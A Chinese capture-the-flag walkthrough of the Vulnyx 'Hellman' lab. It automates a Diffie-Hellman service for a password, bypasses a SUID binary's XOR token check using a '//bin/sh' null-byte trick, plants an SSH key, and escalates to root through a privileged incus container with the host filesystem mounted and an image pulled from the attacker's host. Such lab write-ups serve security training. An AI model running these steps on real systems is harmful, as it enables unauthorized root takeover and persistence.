Vulnyx-Hellman

不是兄弟
不不是兄弟
无今生无来世
不是兄弟

靶机ip:192.168.56.253

难度:中等

涉及内容:

Diffie-Hellman 密钥交换自动化

  • 核心:利用 Python pwntools 库实现全自动化交互,解决基于时间限制的连续 500 次密钥计算挑战。

SUID 二进制程序的逻辑漏洞与 Null Byte 截断

  • 核心:利用 C 语言字符串处理特性(\x00 截断)绕过 memcmp 比较,结合 XOR 运算的可逆性构造特定 Payload。

Incus (LXD Fork) 容器组权限滥用提权

  • 核心:利用 incus 组权限与系统级守护进程通信,通过创建“特权容器”并挂载宿主机根目录,合法地突破文件系统隔离,实现从普通用户到宿主机 Root 的权限跨越。

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.253
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.253:22
Open 192.168.56.253:80
Open 192.168.56.253:1337
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 04:02 -0500
Initiating ARP Ping Scan at 04:02
Scanning 192.168.56.253 [1 port]
Completed ARP Ping Scan at 04:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:02
Completed Parallel DNS resolution of 1 host. at 04:02, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:02
Scanning 192.168.56.253 [3 ports]
Discovered open port 80/tcp on 192.168.56.253
Discovered open port 22/tcp on 192.168.56.253
Discovered open port 1337/tcp on 192.168.56.253
Completed SYN Stealth Scan at 04:02, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.56.253
Host is up, received arp-response (0.0021s latency).
Scanned at 2026-02-04 04:02:59 EST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
1337/tcp open  waste   syn-ack ttl 63
MAC Address: 08:00:27:06:F7:27 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.72 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

细节探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.253 -- sV -sC -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.253:22
Open 192.168.56.253:80
Open 192.168.56.253:1337
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} sV -sC -A" on ip 192.168.56.253
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 04:03 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:03
Completed NSE at 04:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:03
Completed Parallel DNS resolution of 1 host. at 04:03, 1.00s elapsed
Initiating System DNS resolution of 1 host. at 04:03
Completed System DNS resolution of 1 host. at 04:04, 15.28s elapsed
DNS resolution of 2 IPs took 16.28s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating ARP Ping Scan at 04:04
Scanning 192.168.56.253 [1 port]
Completed ARP Ping Scan at 04:04, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:04
Completed Parallel DNS resolution of 1 host. at 04:04, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:04
Scanning 192.168.56.253 [3 ports]
Discovered open port 22/tcp on 192.168.56.253
Discovered open port 80/tcp on 192.168.56.253
Discovered open port 1337/tcp on 192.168.56.253
Completed SYN Stealth Scan at 04:04, 0.03s elapsed (3 total ports)
Initiating Service scan at 04:04
Scanning 3 services on 192.168.56.253
Completed Service scan at 04:05, 90.77s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.253
NSE: Script scanning 192.168.56.253.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 1.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 1.57s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
Nmap scan report for 192.168.56.253
Host is up, received arp-response (0.0020s latency).
Scanned at 2026-02-04 04:04:07 EST for 95s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 64 nginx
|_http-title: Diffie-Hellman Challenge Guide
| http-methods: 
|_  Supported Methods: GET HEAD
1337/tcp open  waste?  syn-ack ttl 63
| fingerprint-strings: 
|   GenericLines, NULL: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     12155994938422981215964509590666713297427949124149261214435542990394096795844
|     123776771942298527222569669816194067521883401233253810775718084513927975219327780026067469888875902774158600210623087177201052421451507940145394749236155149738619538974513396792274687207204723242778525640987194511132794070659543
|   GetRequest: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     4861644867584153036535754867400945165463126657175747225284300114412308757650
|_    3464811914238268294551333137608802397229188516332387144976948469468724626392301995945427763016449746111506513842399019494083534309357436608653860382238334274527954079275319993376542861223554104327418018580217547322346673868874132
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.98%I=7%D=2/4%Time=69830B8D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,472,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key\.\nYou've\x2
SF:0also\x20been\x20given\x20your\x20private\x20key\.\nNow\x20calculate\x2
SF:0your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x2024103124269210325
SF:88552076022197566074856950548502459942654116941958108831682612228890093
SF:85826134161467322714147790401219650364895705058263194273070680500922306
SF:27347453410734066962460145893616597740410271692494532003787294341703258
SF:43778659198143763193776859869524088940195577346119843545301547043747207
SF:74996976375008430892633929555996888245787241299381012913029459299994792
SF:63652640592846472097303849472116814344647144384885209401274598442888593
SF:36526896320919633919\n\nb\x20=\x201215599493842298121596450959066671329
SF:7427949124149261214435542990394096795844\nA\x20=\x201237767719422985272
SF:22569669816194067521883401233253810775718084513927975219327780026067469
SF:88887590277415860021062308717720105242145150794014539474923615514973861
SF:9538974513396792274687207204723242778525640987194511132794070659543")%r
SF:(GenericLines,481,"Alice\x20has\x20sent\x20you\x20her\x20public\x20key\
SF:.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key\.\nNow\x20
SF:calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20=\x2024103
SF:12426921032588552076022197566074856950548502459942654116941958108831682
SF:61222889009385826134161467322714147790401219650364895705058263194273070
SF:68050092230627347453410734066962460145893616597740410271692494532003787
SF:29434170325843778659198143763193776859869524088940195577346119843545301
SF:54704374720774996976375008430892633929555996888245787241299381012913029
SF:45929999479263652640592846472097303849472116814344647144384885209401274
SF:59844288859336526896320919633919\n\nb\x20=\x201215599493842298121596450
SF:9590666713297427949124149261214435542990394096795844\nA\x20=\x201237767
SF:71942298527222569669816194067521883401233253810775718084513927975219327
SF:78002606746988887590277415860021062308717720105242145150794014539474923
SF:61551497386195389745133967922746872072047232427785256409871945111327940
SF:70659543")%r(GetRequest,480,"Alice\x20has\x20sent\x20you\x20her\x20publ
SF:ic\x20key\.\nYou've\x20also\x20been\x20given\x20your\x20private\x20key\
SF:.\nNow\x20calculate\x20your\x20shared\x20secret\.\n\ng\x20=\x202\np\x20
SF:=\x20241031242692103258855207602219756607485695054850245994265411694195
SF:81088316826122288900938582613416146732271414779040121965036489570505826
SF:31942730706805009223062734745341073406696246014589361659774041027169249
SF:45320037872943417032584377865919814376319377685986952408894019557734611
SF:98435453015470437472077499697637500843089263392955599688824578724129938
SF:10129130294592999947926365264059284647209730384947211681434464714438488
SF:520940127459844288859336526896320919633919\n\nb\x20=\x20486164486758415
SF:3036535754867400945165463126657175747225284300114412308757650\nA\x20=\x
SF:20346481191423826829455133313760880239722918851633238714497694846946872
SF:46263923019959454277630164497461115065138423990194940835343093574366086
SF:53860382238334274527954079275319993376542861223554104327418018580217547
SF:322346673868874132");
MAC Address: 08:00:27:06:F7:27 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=2/4%OT=22%CT=%CU=43498%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69830BE6%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=Z%TS=A)O
OS:PS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4S
OS:T11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 17.056 days (since Sun Jan 18 02:44:33 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   2.02 ms 192.168.56.253

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:05
Completed NSE at 04:05, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.98 seconds
           Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)

访问80端口,发现是一个Diffie-Hellman 密钥交换问题。

1
Connection: nc hellman.nyx 1337

写脚本自动解决。

Diffie-Hellman (DH) 算法的安全基石是离散对数问题的难解性。但在本题场景下,服务端充当了“中间人”或“验证者”角色,直接给出了私钥 $b$ 和公钥 $A$ 以及模数 $p$。 此时,该问题不再是密码学破解,而是工程实现问题。挑战在于“时效性”和“连续性”。人工计算无法满足 Timeout 要求,必须通过脚本建立 Socket 长连接,利用 Python 的 pow(base, exp, mod) 高效算法在毫秒级完成 $S = A^b \pmod p$ 的大数运算并回传。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat exp.py 
from pwn import *
import re

# 配置连接信息
HOST = '192.168.56.253'
PORT = 1337

# 初始化连接
io = remote(HOST, PORT)

# 挑战要求连续完成 500 次
TOTAL_ROUNDS = 500

# 用于存储可能跨轮次保持不变的 p 值
current_p = None

print(f"[*] Starting {TOTAL_ROUNDS} rounds of Diffie-Hellman exchange...")

for i in range(TOTAL_ROUNDS):
    try:
        # 1. 接收数据直到出现输入提示符 '>'
        # decode() 将字节转换为字符串以便正则匹配
        data = io.recvuntil(b'>').decode()

        # 2. 使用正则表达式提取变量
        # 格式通常是 "var = number"
        
        # 提取 p (模数)
        p_match = re.search(r'p\s*=\s*(\d+)', data)
        if p_match:
            current_p = int(p_match.group(1))
        
        # 提取 A (Alice 的公钥)
        A_match = re.search(r'A\s*=\s*(\d+)', data)
        current_A = int(A_match.group(1)) if A_match else None

        # 提取 b (你的私钥)
        b_match = re.search(r'b\s*=\s*(\d+)', data)
        current_b = int(b_match.group(1)) if b_match else None

        # 3. 计算共享密钥
        # 公式: S = A^b mod p
        # Python 的 pow(base, exp, mod) 函数支持大数高效运算
        if current_p and current_A and current_b:
            shared_secret = pow(current_A, current_b, current_p)
            
            # 4. 发送结果
            io.sendline(str(shared_secret).encode())
            
            # 打印进度 (可选,为了不刷屏每10次打印一次)
            if (i + 1) % 10 == 0:
                print(f"[+] Round {i+1}/{TOTAL_ROUNDS} completed.")
        else:
            print(f"[!] Error in round {i+1}: Missing parameters.")
            print("Data received:\n", data)
            break

    except EOFError:
        print("[!] Server closed connection.")
        break
    except Exception as e:
        print(f"[!] Exception: {e}")
        break

# 5. 交互模式
# 循环结束后,如果有 Flag 输出,通过 interactive() 查看
print("[*] Challenge finished. Switching to interactive mode...")
io.interactive()
                                                                         
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py                               
[+] Opening connection to 192.168.56.253 on port 1337: Done
[*] Starting 500 rounds of Diffie-Hellman exchange...
[+] Round 10/500 completed.
[+] Round 20/500 completed.
[+] Round 30/500 completed.
[+] Round 40/500 completed.
[+] Round 50/500 completed.
[+] Round 60/500 completed.
[+] Round 70/500 completed.
[+] Round 80/500 completed.
[+] Round 90/500 completed.
[+] Round 100/500 completed.
[+] Round 110/500 completed.
[+] Round 120/500 completed.
[+] Round 130/500 completed.
[+] Round 140/500 completed.
[+] Round 150/500 completed.
[+] Round 160/500 completed.
[+] Round 170/500 completed.
[+] Round 180/500 completed.
[+] Round 190/500 completed.
[+] Round 200/500 completed.
[+] Round 210/500 completed.
[+] Round 220/500 completed.
[+] Round 230/500 completed.
[+] Round 240/500 completed.
[+] Round 250/500 completed.
[+] Round 260/500 completed.
[+] Round 270/500 completed.
[+] Round 280/500 completed.
[+] Round 290/500 completed.
[+] Round 300/500 completed.
[+] Round 310/500 completed.
[+] Round 320/500 completed.
[+] Round 330/500 completed.
[+] Round 340/500 completed.
[+] Round 350/500 completed.
[+] Round 360/500 completed.
[+] Round 370/500 completed.
[+] Round 380/500 completed.
[+] Round 390/500 completed.
[+] Round 400/500 completed.
[+] Round 410/500 completed.
[+] Round 420/500 completed.
[+] Round 430/500 completed.
[+] Round 440/500 completed.
[+] Round 450/500 completed.
[+] Round 460/500 completed.
[+] Round 470/500 completed.
[+] Round 480/500 completed.
[+] Round 490/500 completed.
[+] Round 500/500 completed.
[*] Challenge finished. Switching to interactive mode...
[*] Switching to interactive mode
 Correct!

Congrats! Here's the flag: 676f643a6e756d626572735f6172655f68617264
[*] Got EOF while reading in interactive
$ id
$ 
[*] Interrupted
[*] Closed connection to 192.168.56.253 port 1337

得到676f643a6e756d626572735f6172655f68617264

使用赛博厨子解密

成功以god的身份登录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh god@192.168.56.253  
god@192.168.56.253's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Hellman:~$ ls
user.txt
Hellman:~$ cat user.txt 
    /\_____/\
   /  o   o  \
  ( ==  ^  == )
   )         (
  (           )
 ( (  )   (  ) )
(__(__)___(__)__)

c9461249ea2e074a338b82db919b3fb9
Hellman:~$ sudo -l
-sh: sudo: not found
Hellman:~$ ls /
bin         dev         home        lost+found  mnt         proc        run         srv         tmp         var
boot        etc         lib         media       opt         root        sbin        sys         usr
Hellman:~$ ls /opt
containerd  dh-chal
Hellman:~$ id
uid=1001(god) gid=1001(god) groups=1001(god)
Hellman:~$ ls /home
god    water
Hellman:~$ find / -perm -4000 2>/dev/null
/bin/bbsuid
/usr/libexec/dbus-daemon-launch-helper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/secure_auth
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn

查看suid位文件,发现一个不常见的文件名secure_auth,拖出来逆向分析一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v4; // rdx
  char *s; // [rsp+10h] [rbp-120h]
  const char *s1; // [rsp+18h] [rbp-118h]
  char s2[264]; // [rsp+20h] [rbp-110h] BYREF
  unsigned __int64 v8; // [rsp+128h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  if ( argc > 2 )
  {
    s = (char *)argv[1];
    s1 = argv[2];
    xor_cipher(s, key, s2);
    v4 = strlen(s);
    if ( !memcmp(s1, s2, v4) )
    {
      puts("[+] Auth successful. Switching to UID 1002...");
      if ( setresgid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresgid failed");
      if ( setresuid(0x3EAu, 0x3EAu, 0x3EAu) )
        perror("setresuid failed");
      system(s);
    }
    else
    {
      puts("[-] Auth failed.");
    }
    return 0;
  }
  else
  {
    printf("Usage: %s <command> <token>\n", *argv);
    return 1;
  }
}

使用gdb设置断点,动态调试获得token。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# gdb ./secure_auth 
GNU gdb (Debian 17.1-1) 17.1
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./secure_auth...
(gdb) break memcmp
Breakpoint 1 at 0x1070
(gdb) run /bin/sh AAAAA
Starting program: /home/kali/Desktop/secure_auth /bin/sh AAAAA

Breakpoint 1, 0x00007ffff7f7e8a0 in memcmp () from /lib/ld-musl-x86_64.so.1
(gdb) x/s $rsi
0x7fffffffe020: "\033"
(gdb) x/8xb $rsi
0x7fffffffe020: 0x1b    0x00    0x59    0x59    0x18    0x42    0x5b    0x00
(gdb) run //bin/sh AAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/secure_auth //bin/sh AAAAAAAA

Breakpoint 1, 0x00007ffff7f7e8a0 in memcmp () from /lib/ld-musl-x86_64.so.1
(gdb) x/10xb $rsi
0x7fffffffe020: 0x1b    0x4d    0x52    0x5e    0x59    0x1e    0x40    0x58
0x7fffffffe028: 0x00    0x13
(gdb)

注意这里不能用/bin/sh,因为会出现00截断的问题。

原理深度解析: 1. Null Byte 截断 (Off-by-one/Logic Flaw): C 语言中的字符串函数(如 strlen, printf, strcmp)均以 \x00 作为结束符,而操作系统的 execve 参数传递的是字节流。 当 XOR 结果中出现 \x00 时,作为命令行参数传入的 Token 会被截断,导致 memcmp 比较长度不足或逻辑错误。

2. 命令变形 (Command Mutation): 使用 //bin/sh 替代 /bin/sh 是为了改变参与异或运算的明文字符串(/ 的 ASCII 是 0x2f,b 是 0x62),从而“移位”或“改变”计算出的密文,规避掉结果中的 \x00 字节,同时在 Linux 路径解析中,多余的 / 会被忽略,不影响命令执行。

得到token,直接运行程序即可

1
2
3
4
5
Hellman:~$ /usr/bin/secure_auth //bin/sh $(printf "\x1b\x4d\x52\x5e\x59\x1e\x40\x58")
[+] Auth successful. Switching to UID 1002...
~ $ id
uid=1002(water) gid=1002(water) groups=1001(god)

上传linpeas进一步分析。

1
2
uid=1002(water) gid=1002(water) groups=1002(water),106(incus)

发现water在incus组里。

检查incus组成员

1
2
3
4
/home/water $ grep incus /etc/group
incus:x:106:water
incus-user:x:107:
incus-admin:x:108:
1
2
3
/home/water $  ls -l /var/lib/incus/unix.socket
srw-rw----    1 root     incus            0 Feb  4 16:58 /var/lib/incus/unix.socket
/home/water $

但目前无法操作incus,ssh放置公钥以water的身份登录。

1
2
3
4
5
/home/water $ mkdir .ssh
/home/water $ cd .ssh/
/home/water/.ssh $ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
/home/water/.ssh $ 

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kaada)-[~/.ssh]
└─# ssh water@192.168.56.253                     
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Hellman:~$ id
uid=1002(water) gid=1002(water) groups=106(incus),1002(water)
Hellman:~$

查看本地镜像

1
2
3
4
5
6
7
8
Hellman:~$ incus image list
To start your first container, try: incus launch images:fedora/42
Or for a virtual machine: incus launch images:fedora/42 --vm

+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
Hellman:~$

需要我们手动构建镜像。

守护进程的上帝视角: Incus (以及 LXD) 的守护进程是以 Root 权限运行在宿主机上的。任何属于 incus 组的用户都可以通过 Unix Socket 与这个 Root 守护进程通信。这意味着,拥有 incus 组权限等同于拥有 Root 权限,只是还需要一步“转化”过程。

2. 特权容器 (Privileged Container): 默认情况下,容器是“非特权”的,容器内的 root (UID 0) 会被映射为宿主机上的一个普通用户 (如 UID 100000),这是 User Namespace (用户命名空间) 隔离机制。 当我们设置 -c security.privileged=true 时,我们显式关闭了这种隔离。此时,容器内的 Root (UID 0) 直接对应宿主机的 Root (UID 0)

3. 跨维度的文件系统挂载incus config device add ... source=/ path=/mnt/root 这条命令通过守护进程,将宿主机的物理根目录直接挂载到了容器内部。 结合第 2 点,既然我们在容器内是真实的 Root,又拥有了宿主机的完整文件系统视图,我们就可以像编辑普通文件一样修改宿主机的 /etc/shadow/root/.ssh/authorized_keys,从而彻底接管宿主机。

总结:这不是漏洞,而是配置滥用。它利用了容器管理工具设计上的“灵活性”(允许挂载物理磁盘)和用户权限分配的不当(将不可信用户加入了管理组)。

1
2
3
4
5
6
7
Hellman:~$ wget 192.168.56.104/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'alpine-v3.13-x86_64-20210218_0139.tar.gz'
alpine-v3.13-x86_64- 100% |***********************************************************************************************************| 3183k  0:00:00 ETA
'alpine-v3.13-x86_64-20210218_0139.tar.gz' saved
Hellman:~$ 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Hellman:~$ incus image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
Hellman:~$ incus init myimage pwn -c security.privileged=true
Creating pwn
Hellman:~$ incus config device add pwn host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to pwn
Hellman:~$ incus start pwn
Hellman:~$ incus exec pwn sh
~ # ls -al /mnt/root/root/
total 44
drwx------    8 root     root          4096 Jan 29 04:25 .
drwxr-xr-x   21 root     root          4096 Jan 29 04:25 ..
lrwxrwxrwx    1 root     root             9 Jun  3  2025 .ash_history -> /dev/null
drwx------    3 root     root          4096 Jan 29 04:25 .cache
drwxr-xr-x    4 root     root          4096 Jan 23 07:54 .config
drwx------    3 root     root          4096 Dec 27 14:39 .docker
drwxr-xr-x    3 root     root          4096 Jun  3  2025 .local
-rw-r--r--    1 root     root            55 Jun  3  2025 .profile
drwx------    2 root     root          4096 Dec 29 16:40 .ssh
drwxr-xr-x    3 root     root          4096 Jan 22 14:55 .vim
-rw-r--r--    1 root     root            91 Jan 22 14:55 .vimrc
-rw-r--r--    1 root     root           632 Jan 28 05:48 root.txt
~ # cat //mnt/root/root/root.txt

写公钥进去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/mnt/root/root # ls -al
total 44
drwx------    8 root     root          4096 Jan 29 04:25 .
drwxr-xr-x   21 root     root          4096 Jan 29 04:25 ..
lrwxrwxrwx    1 root     root             9 Jun  3  2025 .ash_history -> /dev/null
drwx------    3 root     root          4096 Jan 29 04:25 .cache
drwxr-xr-x    4 root     root          4096 Jan 23 07:54 .config
drwx------    3 root     root          4096 Dec 27 14:39 .docker
drwxr-xr-x    3 root     root          4096 Jun  3  2025 .local
-rw-r--r--    1 root     root            55 Jun  3  2025 .profile
drwx------    2 root     root          4096 Dec 29 16:40 .ssh
drwxr-xr-x    3 root     root          4096 Jan 22 14:55 .vim
-rw-r--r--    1 root     root            91 Jan 22 14:55 .vimrc
